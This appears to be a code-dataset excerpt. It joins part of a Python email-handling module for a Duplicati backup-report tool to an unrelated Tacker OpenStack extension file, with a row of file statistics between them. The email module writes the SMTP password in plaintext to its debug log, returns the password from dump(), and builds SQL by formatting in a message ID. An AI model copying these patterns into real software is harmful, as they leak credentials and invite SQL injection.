('warnings', 'Warnings: \[.*^\]', re.MULTILINE|re.DOTALL, 1, ''), # No JSON equivalent
('errors', 'Errors: \[.*^\]', re.MULTILINE|re.DOTALL, 1, ''), # No JSON equivalent
('logdata', 'Log data:(.*?)\n(.*?)(?=\Z)', re.MULTILINE|re.DOTALL, 1, 'LogLines'),
('details', 'Details: .*', re.MULTILINE|re.DOTALL, 1, ''), # No JSON equivalent
('failed', 'Failed: .*', re.MULTILINE|re.DOTALL, 1, ''), # No JSON equivalent
]
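# Hedged illustration (assumption, not part of the original module): each regex
# above is matched against the raw message body, e.g.
#   re.search('ExaminedFiles: \d+', body)   # matches a line like 'ExaminedFiles: 1402'
# searchMessagePart() in EmailServer then strips the label and keeps just '1402'.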
class EmailServer:
def __init__(self, prot, add, prt, acct, pwd, crypt, kalive, fold = None):
self.protocol = prot
self.address = add
self.port = prt
self.accountname = acct
self.passwd = pwd
self.encryption = crypt
self.keepalive = kalive
self.folder = fold
self.server = None
self.newEmails = 0 # List[] of new emails on server. Activated by connect()
self.numEmails = 0 # Number of emails in list
self.nextEmail = 0 # index into list of next email to be retrieved
def dump(self):
return 'protocol=[{}] address=[{}] port=[{}] account=[{}] passwd=[{}] encryption=[{}] keepalive=[{}] folder=[{}]'.format(self.protocol, self.address, self.port, self.accountname, self.passwd, self.encryption, self.keepalive, self.folder)
def connect(self):
globs.log.write(1, 'EmailServer.Connect()')
globs.log.write(3, 'server={} keepalive={}'.format(self.server, self.keepalive))
# See if a server connection is already established
# This is the most common case, so check this first
if self.server != None:
if self.keepalive is False: # Do we care about keepalives?
return None
globs.log.write(3,'Checking server connection')
if self.protocol == 'imap':
try:
status = self.server.noop()[0]
except:
status = 'NO'
if status != 'OK':
globs.log.write(1,'Server {} timed out. Reconnecting.'.format(self.address))
self.server = None
self.connect()
elif self.protocol == 'pop3':
try:
status = self.server.noop()
except:
status = '+NO'
if status.decode() != '+OK': # Stats from POP3 returned as byte string. Need to decode before compare (Issue #107)
globs.log.write(1,'Server {} timed out. Reconnecting.'.format(self.address))
self.server = None
self.connect()
elif self.protocol == 'smtp':
try:
status = self.server.noop()[0]
except: # smtplib.SMTPServerDisconnected
status = -1
if status != 250: # Disconnected. Need to reconnect to server
globs.log.write(1,'Server {} timed out. Reconnecting.'.format(self.address))
self.server = None
self.connect()
else: # Need to establish server connection
if self.protocol == 'imap':
globs.log.write(1,'Initial connect using IMAP')
try:
if self.encryption is not None:
self.server = imaplib.IMAP4_SSL(self.address,self.port)
else:
self.server = imaplib.IMAP4(self.address,self.port)
retVal, data = self.server.login(self.accountname, self.passwd)
globs.log.write(3,'IMAP Logged in. retVal={} data={}'.format(retVal, globs.maskData(data)))
retVal, data = self.server.select(self.folder)
globs.log.write(3,'IMAP Setting folder. retVal={} data={}'.format(retVal, data))
return retVal
except imaplib.IMAP4.error:
return None
except imaplib.socket.gaierror:
return None
elif self.protocol == 'pop3':
globs.log.write(1,'Initial connect using POP3')
try:
if self.encryption is not None:
self.server = poplib.POP3_SSL(self.address,self.port)
else:
self.server = poplib.POP3(self.address,self.port)
retVal = self.server.user(self.accountname)
globs.log.write(3,'Logged in. retVal={}'.format(globs.maskData(retVal)))
retVal = self.server.pass_(self.passwd)
globs.log.write(3,'Entered password. retVal={}'.format(retVal))
return retVal.decode()
except Exception:
return None
elif self.protocol == 'smtp':
globs.log.write(1,'Initial connect using SMTP')
try:
globs.log.write(3,'Initializing SMPT Object. Address=[{}] port=[{}]'.format(self.address,self.port))
self.server = smtplib.SMTP(self.address,self.port)
globs.log.write(3,'self.server=[{}]'.format(self.server))
if self.encryption is not None: # Do we need to use SSL/TLS?
globs.log.write(3,'Starting TLS')
try:
tlsContext = ssl.create_default_context()
self.server.starttls(context=tlsContext)
except Exception as e:
globs.log.write(3,'TLS Exception: [{}]'.format(e))
globs.log.write(3,'Logging into server. Account=[{}] pwd=[{}]'.format(self.accountname, self.passwd))
try:
retVal, retMsg = self.server.login(self.accountname, self.passwd)
globs.log.write(3,'Logged in. retVal={} retMsg={}'.format(retVal, retMsg))
return retMsg.decode()
except Exception as e:
globs.log.write(3,'SMTP Login Exception: [{}]'.format(e))
except (smtplib.SMTPAuthenticationError, smtplib.SMTPConnectError, smtplib.SMTPSenderRefused):
return None
else: # Bad protocol specification
globs.log.err('Invalid protocol specification: {}. Aborting program.'.format(self.protocol))
globs.closeEverythingAndExit(1)
return None
return None
# Close email server connection
def close(self):
if self.server == None:
return None
if self.protocol == 'pop3':
self.server.quit()
elif self.protocol == 'imap':
self.server.close()
elif self.protocol == 'smtp':
self.server.quit()
return None
# Check if there are new messages waiting on the server
# Return number of messages if there
# Return None if empty
def checkForMessages(self):
self.connect()
if self.protocol == 'pop3':
globs.log.write(1,'checkForMessages(POP3)')
self.numEmails = len(self.server.list()[1]) # Get list of new emails
globs.log.write(3,'Number of new emails: {}'.format(self.numEmails))
if self.numEmails == 0: # No new emails
self.newEmails = None
self.nextEmail = 0
return None
self.newEmails = list(range(self.numEmails))
self.nextEmail = -1 # processNextMessage() pre-increments message index. Initializing to -1 ensures the pre-increment start at 0
return self.numEmails
elif self.protocol == 'imap':
globs.log.write(1,'checkForMessages(IMAP)')
# Issue #124 - only read unseen/unread messages. Speed up input processing.
if globs.opts['unreadonly'] == True:
retVal, data = self.server.search(None, "(UNSEEN)")
else:
retVal, data = self.server.search(None, "ALL")
globs.log.write(3,'Searching folder. retVal={} data={}'.format(retVal, data))
if retVal != 'OK': # No new emails
self.newEmails = None
self.numEmails = 0
self.nextEmail = 0
return None
self.newEmails = list(data[0].split()) # Get list of new emails
self.numEmails = len(self.newEmails)
self.nextEmail = -1 # processNextMessage() pre-increments message index. Initializing to -1 ensures the pre-increment start at 0
return self.numEmails
else: # Invalid protocol
return None
# Extract a parenthesized field or the raw data from the result
# Some fields (sizes, date, time) can be presented in text or numeric values (Starting with Canary builds in Jan 2018)
# Examples: EndTime: 1/24/2018 10:01:45 PM (1516852905)
# SizeOfAddedFiles: 10.12 KB (10364)
# SizeOfExaminedFiles: 44.42 GB (47695243956)
# This function will return the value in parentheses (if it exists) or the raw info (if it does not)
# Inputs: val = value to parse, dt = date format string, tf = time format string
def parenOrRaw(self, val, df = None, tf = None, tz = None):
globs.log.write(1,'dremail.parenOrRaw({}, {}, {}, {})'.format(val, df, tf, tz))
retval = val # Set default return as input value
# Search for '(XXX)' in value
pat = re.compile('\(.*\)')
match = re.search(pat, val)
if match: # value found in parentheses
retval = val[match.regs[0][0]+1:match.regs[0][1]-1]
else: # No parens found
if df != None: # Looking for date/time
retval = drdatetime.toTimestamp(val, dfmt=df, tfmt=tf, utcOffset=tz)
globs.log.write(1, 'retval=[{}]'.format(retval))
return retval
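# Hedged examples (assumption, not in the original source):
#   parenOrRaw('44.42 GB (47695243956)')  ->  '47695243956'   (parenthesized value wins)
#   parenOrRaw('47695243956')             ->  '47695243956'   (no parens, raw value returned)
#   parenOrRaw('1/24/2018 10:01:45 PM', df='MM/DD/YYYY', tf='HH:MM:SS')
#       falls through to drdatetime.toTimestamp() and returns a timestamp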
# Issue 105
# POP3 presents headers differently than IMAP
# Need to transform POP3 headers into IMAP style so the rest of the program
# can process them properly
def mergePop3Headers(self, hdrBody):
globs.log.write(1,'dremail.mergePop3Headers({})'.format(hdrBody))
hdrLine = ""
for nxtHdr in hdrBody:
hdrLine += nxtHdr.decode('utf-8') + "\r\n"
return hdrLine
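# Hedged illustration (assumption): poplib's top() returns header lines as a
# list of bytes, e.g. [b'Date: ...', b'Subject: ...']; mergePop3Headers() joins
# them with '\r\n' so extractHeaders() can treat POP3 and IMAP identically.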
# Extract specific fields from an email header
# Different email servers create email headers differently
# Also, fields like Subject can be split across multiple lines
# Our mission is to sort it all out
# Return date, subject, message-id, and content-transfer-encoding
def extractHeaders(self, hdrs):
globs.log.write(1,'dremail.extractHeaders({})'.format(hdrs))
hdrFields={} # Dictionary to hold the header fields we found
splitlines = hdrs.split("\r\n") # Split header into separate lines
for line in splitlines:
if line == "": # Some lines are just \r\n
continue
sections = line.split(':',1) # Look for the FIRST colon. Protects against the subject having a colon in it (Issue #104)
if len(sections) == 1: # No header field. This is a continuation of the last header line
hdrFields[lastHeader] += sections[0] # Just concatenate this line to the next one
else:
hdrFields[sections[0].lower()] = sections[1].lstrip().rstrip() # Add field to hdrFields dictionary
lastHeader = sections[0].lower() # Remember this header, in case the next line is a continuation
globs.log.write(1,'Header fields extracted: date=[{}] subject=[{}] message-id=[{}]'.format(hdrFields['date'], hdrFields['subject'], hdrFields['message-id']))
return hdrFields['date'], hdrFields['subject'], hdrFields['message-id'], hdrFields['content-transfer-encoding']
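# Hedged illustration (assumption): a folded header such as
#   'Subject: Duplicati Backup report for\r\n Src-Dest\r\n'
# yields a continuation line with no colon, so it is appended to the previous
# 'subject' entry, reassembling the full subject string.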
# Retrieve and process next message from server
# Returns <Message-ID> or '<INVALID>' if there are more messages in queue, even if this message was unusable
# Returns None if no more messages
def processNextMessage(self):
globs.log.write(1, 'dremail.processNextMessage()')
self.connect()
# Increment message counter to the next message.
# Skip for message #0 because we haven't read any messages yet
self.nextEmail += 1
msgParts = {} # msgParts contains extracts of message elements
statusParts = {} # statusParts contains the individual lines from the Duplicati status emails
dateParts = {} # dateParts contains the date & time strings for the SQL Query
# Check no-more-mail conditions. Either no new emails to get or gone past the last email on list
if (self.newEmails == None) or (self.nextEmail == self.numEmails):
return None
if self.protocol == 'pop3':
# Get message header
server_msg, body, octets = self.server.top((self.newEmails[self.nextEmail])+1,0)
globs.log.write(3, 'server_msg=[{}] body=[{}] octets=[{}]'.format(server_msg,body,octets))
if server_msg[:3].decode() != '+OK':
globs.log.write(1, 'ERROR getting message: {}'.format(self.nextEmail))
return '<INVALID>'
# Get date, subject, and message ID from headers
hdrLine = self.mergePop3Headers(body) # Convert to IMAP format
msgParts['date'], msgParts['subject'], msgParts['messageId'], msgParts['content-transfer-encoding'] = self.extractHeaders(hdrLine) # extractHeaders() returns four values
elif self.protocol == 'imap':
# Get message header
retVal, data = self.server.fetch(self.newEmails[self.nextEmail],'(BODY.PEEK[HEADER.FIELDS (DATE SUBJECT MESSAGE-ID CONTENT-TRANSFER-ENCODING)])')
if retVal != 'OK':
globs.log.write(1, 'ERROR getting message: {}'.format(self.nextEmail))
return '<INVALID>'
globs.log.write(3,'Server.fetch(): retVal=[{}] data=[{}]'.format(retVal,data))
msgParts['date'], msgParts['subject'], msgParts['messageId'], msgParts['content-transfer-encoding'] = self.extractHeaders(data[0][1].decode('utf-8'))
else: # Invalid protocol spec
globs.log.err('Invalid protocol specification: {}.'.format(self.protocol))
return None
# Log message basics
globs.log.write(1,'\n*****\nNext Message: Date=[{}] Subject=[{}] Message-Id=[{}] Transfer-Encoding=[{}]'.format(msgParts['date'], msgParts['subject'], msgParts['messageId'], msgParts['content-transfer-encoding']))
# Check if any of the vital parts are missing
if msgParts['messageId'] is None or msgParts['messageId'] == '':
globs.log.write(1,'No message-Id. Abandoning processNextMessage()')
return '<INVALID>'
if msgParts['date'] is None or msgParts['date'] == '':
globs.log.write(1,'No Date. Abandoning processNextMessage()')
return msgParts['messageId']
if msgParts['subject'] is None or msgParts['subject'] == '':
globs.log.write(1,'No Subject. Abandoning processNextMessage()')
return msgParts['messageId']
# See if it's a message of interest
# Match subject field against 'subjectregex' parameter from RC file (Default: 'Duplicati Backup report for...')
if re.search(globs.opts['subjectregex'], msgParts['subject']) == None:
globs.log.write(1, 'Message [{}] is not a Message of Interest. Can\'t match subjectregex from .rc file. Skipping message.'.format(msgParts['messageId']))
return msgParts['messageId'] # Not a message of Interest
# Get source & desination computers from email subject
srcRegex = '{}{}'.format(globs.opts['srcregex'], re.escape(globs.opts['srcdestdelimiter']))
destRegex = '{}{}'.format(re.escape(globs.opts['srcdestdelimiter']), globs.opts['destregex'])
globs.log.write(3,'srcregex=[{}] destRegex=[{}]'.format(srcRegex, destRegex))
partsSrc = re.search(srcRegex, msgParts['subject'])
partsDest = re.search(destRegex, msgParts['subject'])
if (partsSrc is None) or (partsDest is None): # Correct subject but delimiter not found. Something is wrong.
globs.log.write(2,'SrcDestDelimiter [{}] not found in subject line. Skipping message.'.format(globs.opts['srcdestdelimiter']))
return msgParts['messageId']
# See if the record is already in the database, meaning we've seen it before
if globs.db.searchForMessage(msgParts['messageId']): # Is message is already in database?
# Mark the email as being seen in the database
globs.db.execSqlStmt('UPDATE emails SET dbSeen = 1 WHERE messageId = \"{}\"'.format(msgParts['messageId']))
globs.db.dbCommit()
return msgParts['messageId']
# Message not yet in database. Proceed.
globs.log.write(1, 'Message ID [{}] does not yet exist in DB.'.format(msgParts['messageId']))
dTup = email.utils.parsedate_tz(msgParts['date'])
if dTup:
# See if there's timezone info in the email header data. May be 'None' if no TZ info in the date line
# TZ info is represented by seconds offset from UTC
# We don't need to adjust the email date for TimeZone info now, since date line in email already accounts for TZ.
# All other calls to toTimestamp() should include timezone info
msgParts['timezone'] = dTup[9]
# Set date into a parseable string
# It doesn't matter what date/time format we pass in (as long as it's valid)
# When it comes back out later, it'll be parsed into the user-defined format from the .rc file
# For now, we'll use YYYY/MM/DD HH:MM:SS
xDate = '{:04d}/{:02d}/{:02d} {:02d}:{:02d}:{:02d}'.format(dTup[0], dTup[1], dTup[2], dTup[3], dTup[4], dTup[5])
dtTimStmp = drdatetime.toTimestamp(xDate, dfmt='YYYY/MM/DD', tfmt='HH:MM:SS') # Convert the string into a timestamp
msgParts['emailTimestamp'] = dtTimStmp
globs.log.write(3, 'emailDate=[{}]-[{}]'.format(dtTimStmp, drdatetime.fromTimestamp(dtTimStmp)))
msgParts['sourceComp'] = re.search(srcRegex, msgParts['subject']).group().split(globs.opts['srcdestdelimiter'])[0]
msgParts['destComp'] = re.search(destRegex, msgParts['subject']).group().split(globs.opts['srcdestdelimiter'])[1]
globs.log.write(3, 'sourceComp=[{}] destComp=[{}] emailTimestamp=[{}] subject=[{}]'.format(msgParts['sourceComp'], \
msgParts['destComp'], msgParts['emailTimestamp'], msgParts['subject']))
# Search for source/destination pair in database. Add if not already there
retVal = globs.db.searchSrcDestPair(msgParts['sourceComp'], msgParts['destComp'])
# Extract the body (payload) from the email
if self.protocol == 'pop3':
# Retrieve the whole message. This is redundant with the previous .top() call and results in extra data downloads
# In cases where there is a mix of Duplicati and non-Duplicati emails to read, this actually saves time at scale.
# In cases where all the emails on the server are Duplicati emails, this does, in fact, slow things down a bit
# POP3 is a stupid protocol. Use IMAP if at all possible.
server_msg, body, octets = self.server.retr((self.newEmails[self.nextEmail])+1)
msgTmp=''
for j in body:
msgTmp += '{}\n'.format(j.decode("utf-8"))
msgBody = email.message_from_string(msgTmp)._payload # Get message body
elif self.protocol == 'imap':
# Retrieve just the body text of the message.
retVal, data = self.server.fetch(self.newEmails[self.nextEmail],'(BODY.PEEK[TEXT])')
# Fix issue #71
# From https://stackoverflow.com/questions/2230037/how-to-fetch-an-email-body-using-imaplib-in-python
# "...usually the data format is [(bytes, bytes), bytes] but when the message is marked as unseen manually,
# the format is [bytes, (bytes, bytes), bytes] – Niklas R Sep 8 '15 at 23:29
# Need to check if len(data)==2 (normally unread) or ==3 (manually set unread)
globs.log.write(3,'dataLen={}'.format(len(data)))
if len(data) == 2:
msgBody = data[0][1].decode('utf-8') # Get message body
else:
msgBody = data[1][1].decode('utf-8') # Get message body
globs.log.write(3, 'Message Body=[{}]'.format(msgBody))
if msgParts['content-transfer-encoding'].lower() == 'quoted-printable':
msgBody = quopri.decodestring(msgBody.replace('=0D=0A','\n')).decode("utf-8")
globs.log.write(3, 'New (quopri) Message Body=[{}]'.format(msgBody))
# See if email is text or JSON. JSON messages begin with '{"Data":'
globs.log.write(3, "msgBody[:8] = [{}]".format(msgBody[:8]))
isJson = msgBody.startswith('{"Data":')
if isJson:
jsonStatus = json.loads(msgBody.replace("=\r\n","").replace("=\n",""), strict = False) # Top-level JSON data
jsonData = jsonStatus['Data'] # 'Data' branch under main data
# Get message fields from JSON column in lineParts list
for section,regex,flag,typ,jsonSection in lineParts:
statusParts[section] = self.searchMessagePartJson(jsonData, jsonSection, typ)
# See if there are log lines to display
if len(jsonStatus['LogLines']) > 0:
statusParts['logdata'] = jsonStatus['LogLines'][0]
else:
statusParts['logdata'] = ''
if statusParts['parsedResult'] != 'Success': # Error during backup
# Set appropriate fail/message fields to relevant values
# The JSON report has somewhat different fields than the "classic" report, so we have to fudge this a little bit
# so we can use common code to process both types later.
statusParts['failed'] = 'Failure'
if statusParts['parsedResult'] == '':
statusParts['parsedResult'] = 'Failure'
statusParts['errors'] = jsonData['Message'] if 'Message' in jsonData else ''
else: # Not JSON - standard message format
# Go through each element in lineParts{}, get the value from the body, and assign it to the corresponding element in statusParts{}
for section,regex,flag,typ, jsonSection in lineParts:
statusParts[section] = self.searchMessagePart(msgBody, regex, flag, typ) # Get the field parts
# Adjust fields if not a clean run
globs.log.write(3, "statusParts['failed']=[{}]".format(statusParts['failed']))
if statusParts['failed'] == '': # Looks like a good run
# Get the start and end times of the backup
if isJson:
dateParts['endTimestamp'] = drdatetime.toTimestampRfc3339(statusParts['endTimeStr'], utcOffset = msgParts['timezone'])
dateParts['beginTimestamp'] = drdatetime.toTimestampRfc3339(statusParts['beginTimeStr'], utcOffset = msgParts['timezone'])
else:
# Some fields in "classic" Duplicati report output are displayed in standard format or detailed format (in parentheses)
# For example:
# SizeOfModifiedFiles: 23 KB (23556)
# SizeOfAddedFiles: 10.12 KB (10364)
# SizeOfExaminedFiles: 44.42 GB (47695243956)
# SizeOfOpenedFiles: 33.16 KB (33954)
# JSON output format does not use parenthesized format (see https://forum.duplicati.com/t/difference-in-json-vs-text-output/7092 for more explanation)
# Extract the parenthesized value (if present) or the raw value (if not)
dt, tm = globs.optionManager.getRcSectionDateTimeFmt(msgParts['sourceComp'], msgParts['destComp'])
dateParts['endTimestamp'] = self.parenOrRaw(statusParts['endTimeStr'], df = dt, tf = tm, tz = msgParts['timezone'])
dateParts['beginTimestamp'] = self.parenOrRaw(statusParts['beginTimeStr'], df = dt, tf = tm, tz = msgParts['timezone'])
statusParts['sizeOfModifiedFiles'] = self.parenOrRaw(statusParts['sizeOfModifiedFiles'])
statusParts['sizeOfAddedFiles'] = self.parenOrRaw(statusParts['sizeOfAddedFiles'])
statusParts['sizeOfExaminedFiles'] = self.parenOrRaw(statusParts['sizeOfExaminedFiles'])
statusParts['sizeOfOpenedFiles'] = self.parenOrRaw(statusParts['sizeOfOpenedFiles'])
globs.log.write(3, 'Email indicates a successful backup. Date/time is: end=[{}] begin=[{}]'.format(dateParts['endTimestamp'], dateParts['beginTimestamp']))
else: # Something went wrong. Let's gather the details.
if not isJson:
statusParts['errors'] = statusParts['failed']
statusParts['parsedResult'] = 'Failure'
statusParts['warnings'] = statusParts['details']
globs.log.write(2, 'Errors=[{}]'.format(statusParts['errors']))
globs.log.write(2, 'Warnings=[{}]'.format(statusParts['warnings']))
globs.log.write(2, 'Log Data=[{}]'.format(statusParts['logdata']))
# Since the backup job report never ran, we'll use the email date/time as the report date/time
dateParts['endTimestamp'] = msgParts['emailTimestamp']
dateParts['beginTimestamp'] = msgParts['emailTimestamp']
globs.log.write(3, 'Email indicates a failed backup. Replacing date/time with: end=[{}] begin=[{}]'.format(dateParts['endTimestamp'], dateParts['beginTimestamp']))
# Replace commas (,) with newlines (\n) in message fields. Sqlite really doesn't like commas in SQL statements!
for part in ['messages', 'warnings', 'errors', 'logdata']:
if statusParts[part] != '':
statusParts[part] = statusParts[part].replace(',','\n')
# If we're just collecting and get a warning/error, we may need to send an email to the admin
if (globs.opts['collect'] is True) and (globs.opts['warnoncollect'] is True) and ((statusParts['warnings'] != '') or (statusParts['errors'] != '')):
errMsg = 'Duplicati error(s) on backup job\n'
errMsg += 'Message ID {} on {}\n'.format(msgParts['messageId'], msgParts['date'])
errMsg += 'Subject: {}\n\n'.format(msgParts['subject'])
if statusParts['warnings'] != '':
errMsg += 'Warnings:' + statusParts['warnings'] + '\n\n'
if statusParts['errors'] != '':
errMsg += 'Errors:' + statusParts['errors'] + '\n\n'
if statusParts['logdata'] != '':
errMsg += 'Log Data:' + statusParts['logdata'] + '\n\n'
globs.outServer.sendErrorEmail(errMsg)
globs.log.write(3, 'Resulting timestamps: endTimeStamp=[{}] beginTimeStamp=[{}]'.format(drdatetime.fromTimestamp(dateParts['endTimestamp']), drdatetime.fromTimestamp(dateParts['beginTimestamp'])))
globs.db.execEmailInsertSql(msgParts, statusParts, dateParts)
return msgParts['messageId']
# Issue #111 feature request
# Provide ability to mark messages as read/seen if [main]optread is true in the .rc file.
# This function only works for IMAP. POP3 doesn't have this capability.
def markMessagesRead(self):
globs.log.write(1, 'dremail.markMessagesRead(protocol={})'.format(self.protocol))
globs.log.write(2, 'Marking {} messages as read'.format(self.numEmails))
for msg in range(self.numEmails):
self.server.store(self.newEmails[msg], '+FLAGS', r'\Seen') # raw string avoids the invalid '\S' escape
globs.log.write(1, 'dremail.markMessagesRead(): complete')
return
# Search for field in message
# msgField - text to search against
# regex - regex to search for
# multiLine - 0=single line, 1=multi-line
# type - 0=int or 1=string
def searchMessagePart(self, msgField, regex, multiLine, typ):
globs.log.write(1, 'EmailServer.searchMesagePart(msgField, {}, {}, {}'.format(regex, multiLine, typ))
match = re.compile(regex, multiLine).search(msgField) # Search msgField for regex match
if match: # Found a match - regex is in msgField
if multiLine == 0: # Single line result
grpSplit = match.group().split() # Split matching text into "words"
grpLen = len(grpSplit)
retData = ''
for num in range(1, len(grpSplit)): # Loop through the number of 'words' expected
retData = retData + grpSplit[num] # Add current 'word' to result
if (num < (grpLen - 1)):
retData = retData + ' ' # Add spaces between words, but not at the end
else: # Multi-line result
retData = match.group() # Group the multi-line data
retData = re.sub(re.compile(r'\s+'), ' ', retData) # Convert multiple white space to a single space
retData = re.sub(re.compile(r'\"'), '\'', retData) # Convert double quotes to single quotes
else: # Pattern not found
if typ == 0: # Integer field
retData = '0'
else: # String field
retData = ''
return retData
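# Hedged examples (assumption, not in the original source):
#   searchMessagePart('ExaminedFiles: 1402', 'ExaminedFiles: \d+', 0, 0)  ->  '1402'
#   If the regex does not match, '0' is returned for integer fields (typ=0)
#   and '' for string fields (typ=1).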
# Search for field in JSON message
def searchMessagePartJson(self, jsonParts, key, typ):
if key in jsonParts:
return jsonParts[key]
# Key wasn't found in the JSON data. Return an appropriate empty value
if typ == 0: # integer
return 0
else: # string
return ''
# Send final email result
def sendEmail(self, msgHtml, msgText = None, subject = None, sender = None, receiver = None):
globs.log.write(2, 'sendEmail(msgHtml={}, msgText={}, subject={}, sender={}, receiver={})'.format(msgHtml, msgText, subject, globs.maskData(sender), globs.maskData(receiver)))
self.connect()
# Build email message
msg = MIMEMultipart('alternative')
if subject is None:
subject = globs.report.reportOpts['reporttitle']
msg['Subject'] = subject
if sender is None:
sender = globs.opts['outsender']
msg['From'] = sender
if receiver is None:
receiver = globs.opts['outreceiver']
msg['To'] = receiver
# Add 'Date' header for RFC compliance - See issue #77
msg['Date'] = email.utils.formatdate(time.time(), localtime=True)
# Record the MIME types of both parts - text/plain and text/html.
# Attach parts into message container.
# According to RFC 2046, the last part of a multipart message is best and preferred.
# So attach text first, then HTML
if msgText is not None:
msgPart = MIMEText(msgText, 'plain')
msg.attach(msgPart)
if msgHtml is not None:
msgPart = MIMEText(msgHtml, 'html')
msg.attach(msgPart)
# See which files need to be emailed
# ofileList consists of tuples of (<filespec>, <emailSpec>)
# <filespec> is "<filename>,<type>"; <emailSpec> is True (attach the file to the email) or False (don't)
if globs.ofileList:
for ofile in globs.ofileList:
if ofile[1]: # True - need to email
fname = ofile[0].split(',')[0]
attachment = open(fname, 'rb')
file_name = os.path.basename(fname)
part = MIMEBase('application','octet-stream')
part.set_payload(attachment.read())
part.add_header('Content-Disposition',
'attachment',
filename=file_name)
encoders.encode_base64(part)
msg.attach(part)
# Send the message via SMTP server.
# The encode('utf-8') was added to deal with non-english character sets in emails. See Issue #26 for details
globs.log.write(2,'Sending email to [{}]'.format(globs.maskData(receiver.split(','))))
self.server.sendmail(sender, receiver.split(','), msg.as_string().encode('utf-8'))
return None
# Send email for errors
def sendErrorEmail(self, errText):
globs.log.write(2, 'sendErrorEmail()')
self.connect()
# Build email message
msg = MIMEMultipart('alternative')
msg['Subject'] = 'Duplicati Job Status Error'
msg['From'] = globs.opts['outsender']
msg['To'] = globs.opts['outreceiver']
msg['Date'] = email.utils.formatdate(time.time(), localtime=True) # Add 'Date' header for RFC compliance - See issue #77
# Record the MIME type. Only need text type
msgPart = MIMEText(errText, 'plain')
msg.attach(msgPart)
# Send the message via local SMTP server.
# The encode('utf-8') was added to deal with non-english character sets in emails. See Issue #26 for details
globs.log.write(2,'Sending error email to [{}]'.format(globs.maskData(globs.opts['outreceiver'].split(','))))
self.server.sendmail(globs.opts['outsender'], globs.opts['outreceiver'].split(','), msg.as_string().encode('utf-8'))
return None
| 58.345808 | 245 | 0.556459 | 4,126 | 38,975 | 5.250606 | 0.189045 | 0.024003 | 0.037805 | 0.018095 | 0.236614 | 0.17753 | 0.148772 | 0.108198 | 0.084749 | 0.069886 | 0 | 0.015334 | 0.324003 | 38,975 | 667 | 246 | 58.433283 | 0.806885 | 0.23569 | 0 | 0.272138 | 0 | 0.008639 | 0.193717 | 0.017414 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030238 | false | 0.015119 | 0.038877 | 0.00216 | 0.153348 | 0.00216 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37b838e0d54c247d6c2708be9b4641d2684a62fb | 4,557 | py | Python | tacker/extensions/common_services.py | hyunchic86/NDN-test | 2417ececbd9a1b9bb4438baf5404cee872e4ec78 | [
"Apache-2.0"
] | null | null | null | tacker/extensions/common_services.py | hyunchic86/NDN-test | 2417ececbd9a1b9bb4438baf5404cee872e4ec78 | [
"Apache-2.0"
] | null | null | null | tacker/extensions/common_services.py | hyunchic86/NDN-test | 2417ececbd9a1b9bb4438baf5404cee872e4ec78 | [
"Apache-2.0"
] | null | null | null | # Copyright 2016 Brocade Communications Systems Inc
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import six
from tacker.api import extensions
from tacker.api.v1 import attributes as attr
from tacker.api.v1 import resource_helper
from tacker.common import exceptions
from tacker.plugins.common import constants
from tacker.services import service_base
class EventCreationFailureException(exceptions.TackerException):
message = _("Failed to create an event: %(error_str)s")
class EventNotFoundException(exceptions.TackerException):
message = _("Specified Event id %(evt_id)s is invalid. Please verify and "
"pass a valid Event id")
class InvalidModelException(exceptions.TackerException):
message = _("Specified model is invalid, only Event model supported")
class InputValuesMissing(exceptions.InvalidInput):
message = _("Parameter input values missing for the key '%(key)s'")
class ParamYAMLInputMissing(exceptions.InvalidInput):
message = _("Parameter YAML input missing")
class InvalidFormat(exceptions.InvalidInput):
message = _("Invalid format. '%(error)s'")
RESOURCE_ATTRIBUTE_MAP = {
'events': {
'id': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
'resource_id': {
'allow_post': False,
'allow_put': False,
'is_visible': True
},
'resource_type': {
'allow_post': False,
'allow_put': False,
'is_visible': True
},
'resource_state': {
'allow_post': False,
'allow_put': False,
'is_visible': True
},
'timestamp': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
'event_details': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
'event_type': {
'allow_post': False,
'allow_put': False,
'is_visible': True,
},
}
}
class Common_services(extensions.ExtensionDescriptor):
@classmethod
def get_name(cls):
return 'COMMONSERVICES'
@classmethod
def get_alias(cls):
return 'Commonservices'
@classmethod
def get_description(cls):
return "Extension for CommonServices"
@classmethod
def get_namespace(cls):
return 'https://wiki.openstack.org/Tacker'
@classmethod
def get_updated(cls):
return "2016-06-06T13:00:00-00:00"
@classmethod
def get_resources(cls):
special_mappings = {}
plural_mappings = resource_helper.build_plural_mappings(
special_mappings, RESOURCE_ATTRIBUTE_MAP)
attr.PLURALS.update(plural_mappings)
return resource_helper.build_resource_info(
plural_mappings, RESOURCE_ATTRIBUTE_MAP, constants.COMMONSERVICES,
translate_name=True)
@classmethod
def get_plugin_interface(cls):
return CommonServicesPluginBase
def update_attributes_map(self, attributes):
super(Common_services, self).update_attributes_map(
attributes, extension_attrs_map=RESOURCE_ATTRIBUTE_MAP)
def get_extended_resources(self, version):
version_map = {'1.0': RESOURCE_ATTRIBUTE_MAP}
return version_map.get(version, {})
@six.add_metaclass(abc.ABCMeta)
class CommonServicesPluginBase(service_base.NFVPluginBase):
def get_plugin_name(self):
return constants.COMMONSERVICES
def get_plugin_type(self):
return constants.COMMONSERVICES
def get_plugin_description(self):
return 'Tacker CommonServices plugin'
@abc.abstractmethod
def get_event(self, context, event_id, fields=None):
pass
@abc.abstractmethod
def get_events(self, context, filters=None, fields=None, sorts=None,
limit=None, marker_obj=None, page_reverse=False):
pass
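# Hedged sketch (assumption, not part of tacker): a minimal concrete plugin
# would subclass CommonServicesPluginBase and implement both abstract methods:
# class DummyCommonServicesPlugin(CommonServicesPluginBase):
#     def get_event(self, context, event_id, fields=None):
#         return {}
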